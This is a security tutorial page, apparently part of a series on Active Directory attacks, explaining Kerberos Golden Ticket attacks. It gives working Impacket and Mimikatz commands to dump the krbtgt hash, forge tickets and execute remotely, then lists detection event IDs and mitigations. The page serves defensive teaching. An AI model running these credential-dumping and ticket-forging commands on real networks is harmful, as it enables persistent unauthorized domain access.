Attack Technique 4: Golden Ticket Attack

Golden Ticket Attacks: An Overview and Mitigation Strategies

Introduction

Golden Ticket attacks exploit the Kerberos authentication protocol in Windows-based networks, enabling attackers to forge Kerberos Ticket Granting Tickets (TGTs). These forged tickets grant unauthorized and persistent access to domain resources, bypassing conventional authentication mechanisms. The key target in this attack is the krbtgt account, which plays a crucial role in encrypting and signing Kerberos tickets.

Attack Overview

  • Exploited Protocol: Kerberos Authentication (Windows Networks)

  • Targeted Account: krbtgt (responsible for domain ticket encryption and signing)

  • Attack Goal: Gain unauthorized access to domain resources and sensitive information.

Attack Process

  1. Initial Breach: The attacker compromises a system within the network.

  2. Privilege Escalation: Attains Domain Administrator privileges, granting access to the krbtgt account.

  3. Data Extraction: Obtains the NTHash of the krbtgt account and the domain’s Security Identifier (SID).

  4. Golden Ticket Creation: Forges a Kerberos TGT with tailored privileges, often mimicking a Domain Administrator account.

Key Characteristics

  • Persistence: The attack bypasses standard authentication checks and remains effective even after initial krbtgt password changes.

  • Broad Access: Grants extensive and enduring network access.

  • Negation Requirement: To fully mitigate the attack, the krbtgt password must be changed twice.

Tools and Techniques to Perform Golden Ticket Attacks

Tool 1: Impacket

Impacket is a collection of Python-based tools that facilitate Kerberos exploitation. The following steps outline its usage:

Step 1: Forging a Golden Ticket

  1. Dump the NTHash of krbtgt Account and Domain SID

    • Tool: secretdump.py Command:

      secretdump.py Administrator:"Password"@<DC_IP_Address>

      Output:

      • NTHash of krbtgt.

      • Domain SID.

  2. Retrieve Domain SID (if unknown)

    • Tool: lookupsid.py Command:

      lookupsid.py EXAMPLE.local/Administrator:"Password"@<DC_IP_Address>

  3. Forge the Golden Ticket

    • Tool: ticketer.py Command:

      ticketer.py -nthash <NTHash> -domain-sid "<Domain_SID>" -domain <Domain_Name> <Target_User>

      Example:

      ticketer.py -nthash bf106a6860c6f7b3317c653a38aba33 -domain-sid "S-5-1-5-21-2049251289-867822404-1193079966" -domain EXAMPLE.local Alice

Step 2: Using the Golden Ticket

  1. Set the Kerberos Ticket Location Command:

    export KRB5CCNAME=/path/to/ticket.ccache

  2. Use Impacket for Command Execution: Command:

    psexec.py $EXAMPLE.local/$Administrator@$TARGET_NAME -target-ip $TARGET_IP -dc-ip $DC_IP -no-pass -k

Tool 2: Mimikatz

Mimikatz is a powerful tool used for credential extraction and ticket manipulation.

Step 1: Compromising the krbtgt Password Hash

  • Command:

    mimikatz.exe "lsadump::dcsync /user:DOMAIN\krbtgt"

    Output:

    • NTLM hash of krbtgt.

    • AES256_HMAC keys.

Step 2: Forging a Golden Ticket

  • Command:

    mimikatz.exe "kerberos::golden /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /aes256:ffa8bd983a5a03618bdf577c2d79a467265f140ba339b89cc0a9c1bfdb4747f5 /id:500 /user:Administrator /groups:GroupNumber /ptt"

Step 3: Using the Forged Ticket

  • The forged ticket can be used to authenticate and access resources within the network, bypassing standard authentication.

Detection Methods for Golden Ticket Attacks

Monitoring specific Windows Event IDs can help identify potential Golden Ticket attacks:

Key Event IDs:

  1. Event ID 4769: Logs Kerberos Service Ticket requests.

    • Key Fields: Account Name, Service Name, Client Address.

  2. Event ID 4624: Logs successful logins.

    • Key Fields: Account Name, Account Domain, Logon ID.

  3. Event ID 4627: Provides details about the logon requestor account.

    • Key Fields: Security ID, Account Name, Account Domain, Logon ID.

Monitoring Strategies:

  • Look for tickets with unusually long lifetimes.

  • Identify service ticket requests for nonexistent or high-privilege accounts.

  • Correlate log events across multiple systems to detect lateral movement patterns.

Mitigation Techniques for Golden Ticket Attacks

  1. Restrict Administrative Privileges: Limit administrative privileges across different security boundaries to reduce exposure.

  2. Minimize Elevated Privileges: Use Domain Admin accounts only when necessary and enforce the Principle of Least Privilege.

  3. Regular krbtgt Password Rotation: Change the krbtgt password regularly and twice in quick succession to invalidate forged tickets:

    • The first change invalidates existing tickets.

    • The second ensures complete mitigation.

  4. Deploy Network Segmentation: Isolate critical resources to limit lateral movement opportunities for attackers.

  5. Implement Multi-Factor Authentication (MFA): Strengthen authentication by requiring multiple verification steps.

  6. Use Monitoring and Logging Solutions: Employ tools to continuously monitor Kerberos ticket activity and alert on anomalies.

  7. Conduct Regular Security Audits: Periodically review access logs, account activity, and security policies to detect vulnerabilities.

Conclusion

Golden Ticket attacks exploit the Kerberos authentication protocol to achieve persistent, unauthorized access to Active Directory environments. By forging TGTs, attackers gain broad network access, bypassing conventional authentication controls.

Effective detection and mitigation strategies, such as krbtgt password rotation, log monitoring, and restricting administrative privileges, are essential to protect against such attacks. Organizations must adopt a proactive security posture, continuously improving their defenses to safeguard critical assets against advanced threats like Golden Ticket attacks.

PreviousAttack Technique 3: KerberoastingNextAttack Technique 5: DCShadow Attack

Last updated